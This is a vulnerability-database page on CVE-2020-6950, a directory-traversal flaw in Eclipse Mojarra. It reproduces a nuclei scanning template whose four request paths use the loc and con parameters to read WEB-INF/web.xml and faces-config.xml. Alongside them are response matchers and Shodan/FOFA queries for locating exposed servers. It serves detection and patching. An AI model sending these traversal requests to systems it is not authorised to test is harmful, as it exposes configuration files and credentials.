Eclipse Mojarra - Local File Read

🗓️ 30 Jun 2026 04:56:11Reported by ProjectDiscoveryType

nuclei🔗 github.com👁 239 Views

Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter

Reporter	Title	Published	Views	Family All 76
FreeBSD	Payara -- path trasversal flaw via either loc/con parameters in Eclipse Mojarra	13 Jan 202000:00	–	freebsd
BDU FSTEC	The vulnerability of the Web Container (JavaServer Faces) component of the Oracle WebLogic Server application server allows a attacker to disclose sensitive information that is protected by security measures.	22 Jan 202000:00	–	bdu_fstec
CNVD	Unspecified Vulnerability in Oracle WebLogic Server (CNVD-2020-08167)	15 Jan 202000:00	–	cnvd
CVE	CVE-2020-6950	2 Jun 202115:49	–	cve
Cvelist	CVE-2020-6950	2 Jun 202115:49	–	cvelist
Debian CVE	CVE-2020-6950	2 Jun 202115:49	–	debiancve
F5 Networks	K000134517: Eclipse vulnerability CVE-2020-6950	9 May 202302:20	–	f5
Tenable Nessus	FreeBSD : Payara -- path trasversal flaw via either loc/con parameters in Eclipse Mojarra (b07bdd3c-0809-11eb-a3a4-0019dbb15b3f)	9 Oct 202000:00	–	nessus
Tenable Nessus	Oracle E-Business Suite (Jan 2022 CPU)	20 Jan 202200:00	–	nessus
Tenable Nessus	Oracle WebLogic Server (Apr 2023 CPU)	19 Apr 202300:00	–	nessus

Source	Link
github	www.github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741
github	www.github.com/eclipse-ee4j/mojarra/issues/4571
nvd	www.nvd.nist.gov/vuln/detail/CVE-2020-6950
bugs	www.bugs.eclipse.org/bugs/show_bug.cgi
oracle	www.oracle.com/security-alerts/cpuapr2022.html

id: CVE-2020-6950

info:
  name: Eclipse Mojarra - Local File Read
  author: iamnoooob,pdresearch
  severity: medium
  description: |
    Directory traversal in Eclipse Mojarra before 2.3.14 allows attackers to read arbitrary files via the loc parameter or con parameter.
  impact: |
    Attackers can read arbitrary files from the server including configuration files and credentials, potentially leading to further exploitation and data exposure.
  remediation: |
    Upgrade to Eclipse Mojarra version 2.3.14 or later.
  reference:
    - https://github.com/eclipse-ee4j/mojarra/commit/cefbb9447e7be560e59da2da6bd7cb93776f7741
    - https://github.com/eclipse-ee4j/mojarra/issues/4571
    - https://nvd.nist.gov/vuln/detail/CVE-2020-6950
    - https://bugs.eclipse.org/bugs/show_bug.cgi?id=550943
    - https://www.oracle.com/security-alerts/cpuapr2022.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-6950
    cwe-id: CWE-22
    epss-score: 0.10124
    epss-percentile: 0.95064
    cpe: cpe:2.3:a:eclipse:mojarra:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    vendor: eclipse
    product: mojarra
    shodan-query:
      - html:"javax.faces.resource"
      - http.html:"javax.faces.viewstate"
      - http.html:"javax.faces.resource"
    fofa-query:
      - body="javax.faces.ViewState"
      - body="javax.faces.viewstate"
      - body="javax.faces.resource"
  tags: cve,cve2020,mojarra,lfi,eclipse,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/javax.faces.resources/web.xml.jsf?loc=/../../WEB-INF"
      - "{{BaseURL}}/javax.faces.resources/web.xml.jsf?con=/../../WEB-INF"
      - "{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?loc=/../../WEB-INF"
      - "{{BaseURL}}/javax.faces.resources/faces-config.xml.jsf?con=/../../WEB-INF"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "application/xml")'
          - 'contains_all(body, "<web-app", "<servlet>") || contains_all(body, "<faces-config", "</faces-config>")'
        condition: and
# digest: 4a0a0047304502210095ef4d479b3a9474823a55d52bac7c36504f350150616c28224f21e8cd869da7022016eb6117e71e98036437213e1e8ea914ea7d94a301f36bd381f08797cbecc04d:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

7High risk

Vulners AI Score7

CVSS 24.3

CVSS 3.16.5

EPSS0.10124